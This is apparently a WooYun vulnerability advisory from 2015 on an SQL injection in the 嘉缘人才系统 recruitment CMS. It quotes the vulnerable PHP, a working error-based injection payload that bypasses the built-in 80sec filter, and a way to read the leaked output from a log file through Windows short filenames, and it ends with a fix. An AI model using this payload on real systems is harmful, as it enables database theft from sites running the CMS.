当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091024

漏洞标题:嘉缘人才系统最新版注入(无视防御)

相关厂商:finereason.com

漏洞作者: 牛肉包子

提交时间:2015-01-13 16:01

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-13: 细节已通知厂商并且等待厂商处理中
2015-01-13: 厂商已经确认,细节仅向厂商公开
2015-01-16: 细节向第三方安全合作伙伴开放
2015-03-09: 细节向核心白帽子及相关领域专家公开
2015-03-19: 细节向普通白帽子公开
2015-03-29: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

rt

详细说明:

看到\member\person_interview.php

if($do=='del'){
	$checks=$_POST['checks'];
    $db ->query("delete from {$cfg['tb_pre']}myinterview where i_pmember='$username' and i_id in ($checks)");
	showmsg('删除成功!',"?m=person_interview&show=$show",0,2000);exit();


由上面的代码可以看出来,$checks直接进入了sql中,而且没有单引号。
但是,这个cms内置了一个80sec的过滤脚本。当然,网上对其的绕过有很详细的方法。

http://127.0.0.1/frcms/member/index.php?m=person_interview&do=del


然后在POST提交数据。

checks=1) and char(@`'`) or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) %23`'`


但是,这样是直接没有回显的,因为它会把sql错误信息写入一个log里面。
这个log文件的命名,可以看到以下代码。

function log_write($message, $type = 'php') {
	global $cfg, $fr_time, $username;
	$userip = getip();
    $fr_time or $fr_time = time();
	$user = $username ? $username : 'guest';
    dir_create(DATA_ROOT.'/log/');
    $log_file = DATA_ROOT.'/log/'.$type.'_'.md5($cfg['cookie_encode']).'.txt';
	$log = date('Y-m-d H:i:s', $fr_time)."||$userip||$user||".$_SERVER['SCRIPT_NAME']."||".str_replace('&', '&', $_SERVER['QUERY_STRING'])."||$message\r\n";
    $olog=file_get_contents($log_file);
    fputs(fopen($log_file,"w"), $log.$olog);
}


通过md5$cfg['cookie_encode'],看起来好像是无法,访问到的。但是,在Windows可以通过短文件名访问。
我们只需要文件名前6位就行。而且这个log前四位固定为sql_,后面两位秒秒钟跑一下就出来了。

漏洞证明:

4.jpg

5.jpg


6.jpg

修复方案:

$checks = preg_replace("/[^0-9,\.-]/i",'',$checks);

版权声明:转载请注明来源 牛肉包子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-13 23:31

厂商回复:

确认存在,感谢!

最新状态:

暂无